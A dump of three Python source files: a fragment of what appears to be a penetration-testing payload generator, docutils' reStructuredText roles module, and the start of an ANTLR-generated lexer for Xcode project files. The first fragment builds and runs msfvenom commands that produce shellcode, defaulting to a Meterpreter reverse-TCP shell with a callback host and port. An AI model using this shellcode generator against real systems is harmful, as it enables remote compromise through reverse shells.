print helpers.color(" [!] WARNING: Invalid option chosen, defaulting to msfvenom!", warning=True)
return None
def menu(self):
"""
Main interactive menu for shellcode selection.
Utilizes Completer() to do tab completion on loaded metasploit payloads.
"""
payloadSelected = None
options = None
showMessage = False
if settings.TERMINAL_CLEAR != "false": showMessage = True
# if no generation method has been selected yet
if self.msfvenomCommand == "" and self.customshellcode == "":
# show banner?
if settings.TERMINAL_CLEAR != "false": showMessage = True
# prompt for custom shellcode or msfvenom
customShellcode = self.custShellcodeMenu(showMessage)
# if custom shellcode is specified, set it
if customShellcode:
self.customshellcode = customShellcode
# else, if no custom shellcode is specified, prompt for metasploit
else:
# instantiate our completer object for tab completion of available payloads
comp = completers.MSFCompleter(self.payloadTree)
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# have the user select the payload
while payloadSelected == None:
print '\n [*] Press %s for windows/meterpreter/reverse_tcp' % helpers.color('[enter]', yellow=True)
print ' [*] Press %s to list available payloads' % helpers.color('[tab]', yellow=True)
try:
payloadSelected = self.required_options['MSF_PAYLOAD'][0]
print ' [>] Please enter metasploit payload: %s' % (payloadSelected)
except:
payloadSelected = raw_input(' [>] Please enter metasploit payload: ').strip()
if payloadSelected == "":
# default to reverse_tcp for the payload
payloadSelected = "windows/meterpreter/reverse_tcp"
try:
parts = payloadSelected.split("/")
# walk down the selected parts of the payload tree to get to the options at the bottom
options = self.payloadTree
for part in parts:
options = options[part]
except KeyError:
# make sure user entered a valid payload
if 'PAYLOAD' in self.required_options: del self.required_options['PAYLOAD']
print helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True)
payloadSelected = None
# remove the tab completer
readline.set_completer(None)
# set the internal payload to the one selected
self.msfvenompayload = payloadSelected
# request a value for each required option
for option in options:
value = ""
while value == "":
### VALIDATION ###
# LHOST is a special case, so we can tab complete the local IP
if option == "LHOST":
try:
value = self.required_options['LHOST'][0]
print ' [>] Enter value for \'LHOST\', [tab] for local IP: %s' % (value)
except:
# set the completer to fill in the local IP
readline.set_completer(completers.IPCompleter().complete)
value = raw_input(' [>] Enter value for \'LHOST\', [tab] for local IP: ').strip()
if '.' in value:
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a regex IP validation
if not re.match(r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$",value):
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True)
value = ""
# otherwise assume we've been passed a domain name
else:
if not helpers.isValidHostname(value):
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True)
value = ""
# if we don't have at least one period in the hostname/IP
else:
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
elif ':' in value:
try:
socket.inet_pton(socket.AF_INET6, value)
except socket.error:
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
else:
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
elif option == "LPORT":
try:
value = self.required_options['LPORT'][0]
print ' [>] Enter value for \'LPORT\': %s' % (value)
except:
# set the completer to fill in the default MSF port (4444)
readline.set_completer(completers.MSFPortCompleter().complete)
value = raw_input(' [>] Enter value for \'LPORT\': ').strip()
try:
if int(value) <= 0 or int(value) >= 65535:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
if 'LPORT' in self.required_options: del self.required_options['LPORT']
value = ""
except ValueError:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
if 'LPORT' in self.required_options: del self.required_options['LPORT']
value = ""
else:
value = raw_input(' [>] Enter value for \'' + option + '\': ').strip()
# append all the msfvenom options
self.msfvenomOptions.append(option + "=" + value)
# allow the user to input any extra OPTION=value pairs
extraValues = list()
while True:
# clear out the tab completion
readline.set_completer(completers.none().complete)
selection = raw_input(' [>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2): ').strip()
if selection != "":
num_extra_options = selection.split(' ')
for xtra_opt in num_extra_options:
                    if xtra_opt != '':
if "=" not in xtra_opt:
print "parameter grammar error!"
continue
if "-" in xtra_opt.split('=')[0]:
final_opt = xtra_opt.split('=')[0] + " " + xtra_opt.split('=')[1]
extraValues.append(final_opt)
else:
final_opt = xtra_opt.split('=')[0] + "=" + xtra_opt.split('=')[1]
extraValues.append(final_opt)
else:
break
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenomOptions = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenomOptions = settings.MSFVENOM_OPTIONS
# build out the msfvenom command
# TODO: detect Windows and modify the paths appropriately
self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payloadSelected
for option in self.msfvenomOptions:
self.msfvenomCommand += " " + option
self.options.append(option)
if len(extraValues) != 0 :
self.msfvenomCommand += " " + " ".join(extraValues)
self.msfvenomCommand += " -f c | tr -d \'\"\' | tr -d \'\\n\'"
def generate(self, required_options=None):
"""
Based on the options set by menu(), setCustomShellcode() or SetPayload()
either returns the custom shellcode string or calls msfvenom
and returns the result.
Returns the shellcode string for this object.
"""
self.required_options = required_options
        # if neither the msfvenom command nor the shellcode is set, revert to
        # the interactive menu to set any options
if self.msfvenomCommand == "" and self.customshellcode == "":
self.menu()
# return custom specified shellcode if it was set previously
if self.customshellcode != "":
return self.customshellcode
# generate the shellcode using msfvenom
else:
print helpers.color("\n [*] Generating shellcode...")
if self.msfvenomCommand == "":
print helpers.color(" [!] ERROR: msfvenom command not specified in payload!\n", warning=True)
return None
else:
                # Strip out extra characters, newlines, etc., leaving just the shellcode.
# Tim Medin's patch for non-root non-kali users
FuncShellcode = subprocess.check_output(settings.MSFVENOM_PATH + self.msfvenomCommand, shell=True)
                # try to get the current MSF build version so we can determine how to
# parse the shellcode
# pretty sure it was this commit that changed everything-
# https://github.com/rapid7/metasploit-framework/commit/4dd60631cbc88e8e6d5322a94a492714ff83fe2f
try:
# get the latest metasploit build version
f = open(settings.METASPLOIT_PATH + "/build_rev.txt")
lines = f.readlines()
f.close()
# extract the build version/data
version = lines[0]
major,date = version.split("-")
# 2014021901 - the version build date where msfvenom shellcode changed
if int(date) < 2014021901:
# use the old way
return FuncShellcode[82:-1].strip()
else:
# new way
return FuncShellcode[22:-1].strip()
# on error, default to the new version
except:
return FuncShellcode[22:-1].strip()
|
gpl-3.0
|
paaschpa/badcomputering
|
docutils/parsers/rst/roles.py
|
6
|
13426
|
# $Id: roles.py 6451 2010-10-25 08:02:43Z milde $
# Author: Edward Loper <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
This module defines standard interpreted text role functions, a registry for
interpreted text roles, and an API for adding to and retrieving from the
registry.
The interface for interpreted role functions is as follows::
def role_fn(name, rawtext, text, lineno, inliner,
options={}, content=[]):
code...
# Set function attributes for customization:
role_fn.options = ...
role_fn.content = ...
Parameters:
- ``name`` is the local name of the interpreted text role, the role name
actually used in the document.
- ``rawtext`` is a string containing the entire interpreted text construct.
Return it as a ``problematic`` node linked to a system message if there is a
problem.
- ``text`` is the interpreted text content, with backslash escapes converted
to nulls (``\x00``).
- ``lineno`` is the line number where the interpreted text begins.
- ``inliner`` is the Inliner object that called the role function.
It defines the following useful attributes: ``reporter``,
``problematic``, ``memo``, ``parent``, ``document``.
- ``options``: A dictionary of directive options for customization, to be
interpreted by the role function. Used for additional attributes for the
generated elements and other functionality.
- ``content``: A list of strings, the directive content for customization
("role" directive). To be interpreted by the role function.
Function attributes for customization, interpreted by the "role" directive:
- ``options``: A dictionary, mapping known option names to conversion
functions such as `int` or `float`. ``None`` or an empty dict implies no
options to parse. Several directive option conversion functions are defined
in the `directives` module.
All role functions implicitly support the "class" option, unless disabled
with an explicit ``{'class': None}``.
- ``content``: A boolean; true if content is allowed. Client code must handle
the case where content is required but not supplied (an empty content list
will be supplied).
Note that unlike directives, the "arguments" function attribute is not
supported for role customization. Directive arguments are handled by the
"role" directive itself.
Interpreted role functions return a tuple of two values:
- A list of nodes which will be inserted into the document tree at the
point where the interpreted role was encountered (can be an empty
list).
- A list of system messages, which will be inserted into the document tree
immediately after the end of the current inline block (can also be empty).
"""
__docformat__ = 'reStructuredText'
from docutils import nodes, utils
from docutils.parsers.rst import directives
from docutils.parsers.rst.languages import en as _fallback_language_module
DEFAULT_INTERPRETED_ROLE = 'title-reference'
"""
The canonical name of the default interpreted role. This role is used
when no role is specified for a piece of interpreted text.
"""
_role_registry = {}
"""Mapping of canonical role names to role functions. Language-dependent role
names are defined in the ``language`` subpackage."""
_roles = {}
"""Mapping of local or language-dependent interpreted text role names to role
functions."""
def role(role_name, language_module, lineno, reporter):
"""
Locate and return a role function from its language-dependent name, along
with a list of system messages. If the role is not found in the current
language, check English. Return a 2-tuple: role function (``None`` if the
named role cannot be found) and a list of system messages.
"""
normname = role_name.lower()
messages = []
msg_text = []
if normname in _roles:
return _roles[normname], messages
if role_name:
canonicalname = None
try:
canonicalname = language_module.roles[normname]
except AttributeError, error:
msg_text.append('Problem retrieving role entry from language '
'module %r: %s.' % (language_module, error))
except KeyError:
msg_text.append('No role entry for "%s" in module "%s".'
% (role_name, language_module.__name__))
else:
canonicalname = DEFAULT_INTERPRETED_ROLE
# If we didn't find it, try English as a fallback.
if not canonicalname:
try:
canonicalname = _fallback_language_module.roles[normname]
msg_text.append('Using English fallback for role "%s".'
% role_name)
except KeyError:
msg_text.append('Trying "%s" as canonical role name.'
% role_name)
# The canonical name should be an English name, but just in case:
canonicalname = normname
# Collect any messages that we generated.
if msg_text:
message = reporter.info('\n'.join(msg_text), line=lineno)
messages.append(message)
# Look the role up in the registry, and return it.
if canonicalname in _role_registry:
role_fn = _role_registry[canonicalname]
register_local_role(normname, role_fn)
return role_fn, messages
else:
return None, messages # Error message will be generated by caller.
def register_canonical_role(name, role_fn):
"""
Register an interpreted text role by its canonical name.
:Parameters:
- `name`: The canonical name of the interpreted role.
- `role_fn`: The role function. See the module docstring.
"""
set_implicit_options(role_fn)
_role_registry[name] = role_fn
def register_local_role(name, role_fn):
"""
Register an interpreted text role by its local or language-dependent name.
:Parameters:
- `name`: The local or language-dependent name of the interpreted role.
- `role_fn`: The role function. See the module docstring.
"""
set_implicit_options(role_fn)
_roles[name] = role_fn
def set_implicit_options(role_fn):
"""
Add customization options to role functions, unless explicitly set or
disabled.
"""
if not hasattr(role_fn, 'options') or role_fn.options is None:
role_fn.options = {'class': directives.class_option}
elif 'class' not in role_fn.options:
role_fn.options['class'] = directives.class_option
def register_generic_role(canonical_name, node_class):
"""For roles which simply wrap a given `node_class` around the text."""
role = GenericRole(canonical_name, node_class)
register_canonical_role(canonical_name, role)
class GenericRole:
"""
Generic interpreted text role, where the interpreted text is simply
wrapped with the provided node class.
"""
def __init__(self, role_name, node_class):
self.name = role_name
self.node_class = node_class
def __call__(self, role, rawtext, text, lineno, inliner,
options={}, content=[]):
set_classes(options)
return [self.node_class(rawtext, utils.unescape(text), **options)], []
class CustomRole:
"""
Wrapper for custom interpreted text roles.
"""
def __init__(self, role_name, base_role, options={}, content=[]):
self.name = role_name
self.base_role = base_role
self.options = None
if hasattr(base_role, 'options'):
self.options = base_role.options
self.content = None
if hasattr(base_role, 'content'):
self.content = base_role.content
self.supplied_options = options
self.supplied_content = content
def __call__(self, role, rawtext, text, lineno, inliner,
options={}, content=[]):
opts = self.supplied_options.copy()
opts.update(options)
cont = list(self.supplied_content)
if cont and content:
cont += '\n'
cont.extend(content)
return self.base_role(role, rawtext, text, lineno, inliner,
options=opts, content=cont)
def generic_custom_role(role, rawtext, text, lineno, inliner,
options={}, content=[]):
""""""
# Once nested inline markup is implemented, this and other methods should
# recursively call inliner.nested_parse().
set_classes(options)
return [nodes.inline(rawtext, utils.unescape(text), **options)], []
generic_custom_role.options = {'class': directives.class_option}
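# --- Illustrative sketch (not part of docutils) -----------------------------
# `generic_custom_role` simply wraps the text in an ``inline`` node, and
# `CustomRole` layers pre-supplied options on top of a base role.  Combining
# the two sketches how a derived role is assembled; the name 'sketch-inline'
# is hypothetical and the instance is not registered here.
_sketch_inline_role = CustomRole('sketch-inline', generic_custom_role,
                                 options={'class': ['sketch-inline']})
# A project could enable it with:
#     register_local_role('sketch-inline', _sketch_inline_role)
# -----------------------------------------------------------------------------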
######################################################################
# Define and register the standard roles:
######################################################################
register_generic_role('abbreviation', nodes.abbreviation)
register_generic_role('acronym', nodes.acronym)
register_generic_role('emphasis', nodes.emphasis)
register_generic_role('literal', nodes.literal)
register_generic_role('strong', nodes.strong)
register_generic_role('subscript', nodes.subscript)
register_generic_role('superscript', nodes.superscript)
register_generic_role('title-reference', nodes.title_reference)
def pep_reference_role(role, rawtext, text, lineno, inliner,
options={}, content=[]):
try:
pepnum = int(text)
if pepnum < 0 or pepnum > 9999:
raise ValueError
except ValueError:
msg = inliner.reporter.error(
'PEP number must be a number from 0 to 9999; "%s" is invalid.'
% text, line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
    # Base URL mainly used by inliner.pep_reference, so this is correct:
ref = (inliner.document.settings.pep_base_url
+ inliner.document.settings.pep_file_url_template % pepnum)
set_classes(options)
return [nodes.reference(rawtext, 'PEP ' + utils.unescape(text), refuri=ref,
**options)], []
register_canonical_role('pep-reference', pep_reference_role)
def rfc_reference_role(role, rawtext, text, lineno, inliner,
options={}, content=[]):
try:
rfcnum = int(text)
if rfcnum <= 0:
raise ValueError
except ValueError:
msg = inliner.reporter.error(
'RFC number must be a number greater than or equal to 1; '
'"%s" is invalid.' % text, line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
# Base URL mainly used by inliner.rfc_reference, so this is correct:
ref = inliner.document.settings.rfc_base_url + inliner.rfc_url % rfcnum
set_classes(options)
node = nodes.reference(rawtext, 'RFC ' + utils.unescape(text), refuri=ref,
**options)
return [node], []
register_canonical_role('rfc-reference', rfc_reference_role)
def raw_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
if not inliner.document.settings.raw_enabled:
msg = inliner.reporter.warning('raw (and derived) roles disabled')
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
if 'format' not in options:
msg = inliner.reporter.error(
'No format (Writer name) is associated with this role: "%s".\n'
'The "raw" role cannot be used directly.\n'
'Instead, use the "role" directive to create a new role with '
'an associated format.' % role, line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
set_classes(options)
node = nodes.raw(rawtext, utils.unescape(text, 1), **options)
return [node], []
raw_role.options = {'format': directives.unchanged}
register_canonical_role('raw', raw_role)
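# --- Illustrative sketch (not part of docutils) -----------------------------
# The error message in raw_role above points users at the "role" directive;
# programmatically, the equivalent is wrapping raw_role in a CustomRole that
# supplies the required 'format' option.  The name 'raw-html-sketch' is
# hypothetical and the instance is not registered here.
_raw_html_sketch_role = CustomRole('raw-html-sketch', raw_role,
                                   options={'format': 'html'})
# A project could enable it with:
#     register_local_role('raw-html-sketch', _raw_html_sketch_role)
# -----------------------------------------------------------------------------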
def math_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
    # Use the raw source between the backticks so that backslash escapes
    # (common in LaTeX) reach the math node unprocessed.
    text = rawtext.split('`')[1]
    node = nodes.math(rawtext, text)
    return [node], []
register_canonical_role('math', math_role)
######################################################################
# Register roles that are currently unimplemented.
######################################################################
def unimplemented_role(role, rawtext, text, lineno, inliner, attributes={}):
msg = inliner.reporter.error(
'Interpreted text role "%s" not implemented.' % role, line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
register_canonical_role('index', unimplemented_role)
register_canonical_role('named-reference', unimplemented_role)
register_canonical_role('anonymous-reference', unimplemented_role)
register_canonical_role('uri-reference', unimplemented_role)
register_canonical_role('footnote-reference', unimplemented_role)
register_canonical_role('citation-reference', unimplemented_role)
register_canonical_role('substitution-reference', unimplemented_role)
register_canonical_role('target', unimplemented_role)
# This should remain unimplemented, for testing purposes:
register_canonical_role('restructuredtext-unimplemented-role',
unimplemented_role)
def set_classes(options):
"""
Auxiliary function to set options['classes'] and delete
options['class'].
"""
if 'class' in options:
assert 'classes' not in options
options['classes'] = options['class']
del options['class']
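# --- Illustrative check (not part of docutils) -------------------------------
# set_classes() is the small normalisation step shared by the roles above: a
# 'class' entry (as produced by directives.class_option) is renamed to the
# 'classes' attribute expected by node constructors.
_example_options = {'class': ['menu']}
set_classes(_example_options)
assert _example_options == {'classes': ['menu']}
# -----------------------------------------------------------------------------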
|
bsd-3-clause
|
Karumi/Kin
|
kin/grammar/PBXProjLexer.py
|
1
|
80888
|
# Generated from PBXProj.g4 by ANTLR 4.9.2
from antlr4 import *
from io import StringIO
import sys
if sys.version_info[1] > 5:
from typing import TextIO
else:
from typing.io import TextIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2\u0087")
buf.write("\u08cb\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\4D\tD\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\4K\tK\4L\t")
buf.write("L\4M\tM\4N\tN\4O\tO\4P\tP\4Q\tQ\4R\tR\4S\tS\4T\tT\4U\t")
buf.write("U\4V\tV\4W\tW\4X\tX\4Y\tY\4Z\tZ\4[\t[\4\\\t\\\4]\t]\4")
buf.write("^\t^\4_\t_\4`\t`\4a\ta\4b\tb\4c\tc\4d\td\4e\te\4f\tf\4")
buf.write("g\tg\4h\th\4i\ti\4j\tj\4k\tk\4l\tl\4m\tm\4n\tn\4o\to\4")
buf.write("p\tp\4q\tq\4r\tr\4s\ts\4t\tt\4u\tu\4v\tv\4w\tw\4x\tx\4")
buf.write("y\ty\4z\tz\4{\t{\4|\t|\4}\t}\4~\t~\4\177\t\177\4\u0080")
buf.write("\t\u0080\4\u0081\t\u0081\4\u0082\t\u0082\4\u0083\t\u0083")
buf.write("\4\u0084\t\u0084\4\u0085\t\u0085\4\u0086\t\u0086\4\u0087")
buf.write("\t\u0087\4\u0088\t\u0088\3\2\3\2\3\3\3\3\3\4\3\4\3\4\3")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\5\3\5")
buf.write("\3\6\3\6\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3")
buf.write("\7\3\7\3\7\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b")
buf.write("\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3\t\3")
buf.write("\t\3\t\3\t\3\t\3\t\3\t\3\t\3\t\3\n\3\n\3\n\3\n\3\n\3\n")
buf.write("\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3")
buf.write("\n\3\n\3\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\13\3\13\3\13\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3")
buf.write("\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\r")
buf.write("\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3")
buf.write("\r\3\r\3\r\3\r\3\r\3\16\3\16\3\16\3\16\3\16\3\16\3\16")
buf.write("\3\16\3\16\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20")
buf.write("\3\20\3\20\3\20\3\20\3\20\3\20\3\21\3\21\3\21\3\21\3\21")
buf.write("\3\21\3\21\3\21\3\21\3\21\3\21\3\22\3\22\3\22\3\22\3\22")
buf.write("\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22")
buf.write("\3\22\3\22\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23")
buf.write("\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23")
buf.write("\3\23\3\23\3\23\3\24\3\24\3\24\3\24\3\24\3\24\3\24\3\24")
buf.write("\3\24\3\24\3\24\3\24\3\24\3\24\3\24\3\24\3\24\3\24\3\24")
buf.write("\3\24\3\24\3\24\3\24\3\24\3\24\3\25\3\25\3\25\3\25\3\25")
buf.write("\3\25\3\25\3\25\3\25\3\25\3\25\3\25\3\25\3\25\3\25\3\25")
buf.write("\3\25\3\25\3\25\3\25\3\25\3\26\3\26\3\26\3\26\3\26\3\26")
buf.write("\3\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26")
buf.write("\3\26\3\26\3\26\3\27\3\27\3\27\3\27\3\27\3\27\3\27\3\27")
buf.write("\3\27\3\27\3\27\3\27\3\27\3\27\3\27\3\27\3\30\3\30\3\30")
buf.write("\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\30")
buf.write("\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\31\3\31\3\31\3\31")
buf.write("\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31")
buf.write("\3\31\3\31\3\31\3\31\3\31\3\32\3\32\3\32\3\32\3\32\3\32")
buf.write("\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\32")
buf.write("\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\32")
buf.write("\3\32\3\32\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33")
buf.write("\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33")
buf.write("\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33")
buf.write("\3\33\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34")
buf.write("\3\34\3\34\3\34\3\34\3\34\3\35\3\35\3\35\3\35\3\35\3\35")
buf.write("\3\35\3\35\3\36\3\36\3\36\3\36\3\36\3\36\3\36\3\36\3\36")
buf.write("\3\36\3\36\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37")
buf.write("\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3 \3 \3 \3 \3 \3 ")
buf.write("\3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3!\3!\3!\3!\3!\3!\3!\3")
buf.write("!\3!\3!\3!\3!\3!\3!\3!\3\"\3\"\3\"\3\"\3\"\3\"\3\"\3\"")
buf.write("\3\"\3\"\3\"\3#\3#\3#\3#\3#\3#\3#\3#\3#\3#\3#\3#\3#\3")
buf.write("$\3$\3$\3$\3$\3$\3$\3$\3$\3$\3$\3$\3$\3$\3$\3$\3$\3%\3")
buf.write("%\3%\3%\3%\3%\3%\3%\3%\3%\3%\3%\3%\3%\3%\3%\3%\3%\3&\3")
buf.write("&\3&\3&\3&\3&\3&\3&\3&\3&\3&\3&\3&\3&\3&\3\'\3\'\3\'\3")
buf.write("\'\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3(\3(\3(\3(\3(\3(\3")
buf.write("(\3(\3(\3)\3)\3)\3)\3)\3)\3)\3)\3)\3*\3*\3*\3*\3*\3*\3")
buf.write("*\3*\3*\3*\3*\3*\3*\3*\3*\3+\3+\3+\3+\3+\3+\3+\3+\3+\3")
buf.write(",\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3")
buf.write(",\3-\3-\3-\3-\3-\3-\3-\3-\3-\3-\3-\3-\3-\3-\3.\3.\3.\3")
buf.write(".\3.\3.\3.\3.\3.\3.\3.\3.\3/\3/\3/\3/\3/\3/\3/\3/\3\60")
buf.write("\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60")
buf.write("\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60")
buf.write("\3\60\3\60\3\60\3\60\3\61\3\61\3\61\3\61\3\61\3\62\3\62")
buf.write("\3\62\3\62\3\62\3\63\3\63\3\63\3\63\3\63\3\63\3\63\3\63")
buf.write("\3\63\3\63\3\63\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64")
buf.write("\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\65\3\65\3\65")
buf.write("\3\65\3\65\3\65\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\66")
buf.write("\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\66")
buf.write("\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\66")
buf.write("\3\66\3\66\3\66\3\66\3\66\3\67\3\67\38\38\39\39\3:\3:")
buf.write("\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3")
buf.write(":\3:\3:\3:\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3<\3<\3")
buf.write("<\3<\3<\3<\3<\3<\3<\3<\3<\3=\3=\3=\3=\3=\3=\3=\3=\3=\3")
buf.write("=\3=\3=\3=\3>\3>\3>\3>\3>\3>\3>\3>\3>\3>\3>\3>\3?\3?\3")
buf.write("?\3?\3?\3?\3?\3?\3?\3?\3?\3?\3?\3?\3?\3?\3?\3@\3@\3@\3")
buf.write("@\3@\3@\3@\3@\3@\3@\3@\3@\3A\3A\3A\3A\3A\3A\3A\3A\3A\3")
buf.write("A\3A\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3")
buf.write("B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3")
buf.write("C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3")
buf.write("C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3C\3D\3")
buf.write("D\3D\3D\3D\3D\3D\3D\3D\3D\3D\3E\3E\3E\3E\3E\3E\3E\3E\3")
buf.write("E\3E\3E\3E\3E\3E\3E\3E\3E\3E\3E\3F\3F\3F\3F\3F\3F\3F\3")
buf.write("F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3")
buf.write("F\3F\3F\3F\3F\3F\3F\3F\3F\3F\3G\3G\3G\3G\3G\3G\3G\3G\3")
buf.write("G\3G\3G\3G\3G\3G\3G\3G\3G\3G\3G\3G\3G\3H\3H\3H\3H\3H\3")
buf.write("H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3")
buf.write("H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3H\3I\3I\3I\3I\3I\3I\3I\3")
buf.write("I\3I\3I\3I\3I\3I\3I\3I\3I\3I\3I\3I\3I\3I\3I\3I\3I\3J\3")
buf.write("J\3J\3J\3J\3J\3J\3J\3J\3J\3J\3J\3J\3J\3J\3J\3J\3K\3K\3")
buf.write("K\3K\3K\3K\3K\3K\3K\3K\3K\3K\3K\3K\3K\3K\3K\3L\3L\3L\3")
buf.write("L\3L\3L\3L\3L\3L\3L\3L\3L\3L\3L\3L\3L\3L\3M\3M\3M\3M\3")
buf.write("M\3M\3M\3M\3M\3M\3M\3M\3M\3M\3M\3M\3M\3M\3M\3M\3M\3M\3")
buf.write("N\3N\3N\3N\3N\3N\3N\3N\3N\3N\3N\3N\3N\3O\3O\3O\3O\3O\3")
buf.write("O\3O\3O\3O\3O\3O\3O\3O\3O\3O\3O\3P\3P\3P\3P\3P\3P\3P\3")
buf.write("P\3P\3P\3P\3P\3P\3P\3P\3P\3P\3P\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3")
buf.write("Q\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3R\3R\3R\3R\3")
